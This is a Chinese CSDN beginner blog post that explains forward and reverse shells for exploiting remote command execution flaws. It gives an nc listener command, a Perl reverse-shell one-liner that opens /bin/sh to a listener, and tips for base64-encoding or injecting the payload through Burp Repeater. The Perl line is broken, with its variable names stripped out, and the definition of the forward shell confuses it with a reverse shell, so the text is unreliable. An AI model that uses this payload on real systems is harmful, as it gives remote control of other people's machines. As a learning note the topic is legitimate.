shell介绍

[基础入门]正向shell和反弹shell-CSDN博客

shell:执行用户命令的接口,通过这个接口实现对计算机的控制

反弹shell:一台主机控制另一台

  1. 正向shell:在攻击机上开启一个监听端口,让被攻击机主动连接攻击机,成功后,攻击机就能控制被攻击机——被攻击机被动攻击是正向的,主动被攻击是反弹shell
  2. 反弹shell:被攻击的机子是内网或者设置了防火墙,攻击机无法连接,但是被攻击机可以连接攻击机,从而被攻击

反弹shell可以用在远程命令执行RCE漏洞上

被攻击机主动连出来:棱角社区

IP选择攻击机的IP,监听端口5566(linux服务器:nc -lvnp 5566),生成的反弹shell语句,让被攻击机执行:远程命令执行或任意命令执行(上文有具体介绍

如果没弹过来:

  1. 可以多复制多执行
  2. 可能无法解析,经过base64编码之后
  3. 或者bp抓包,放到repeater,改成post,echo;[perl语句]:大概率可以实现
perl -e 'use Socket;="127.0.0.1";=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(,inet_aton()))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

然后就会连接到被攻击机,得到他的权限

搜索该漏洞的影响版本,按照wp复现,但是不要真打,容易进去

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值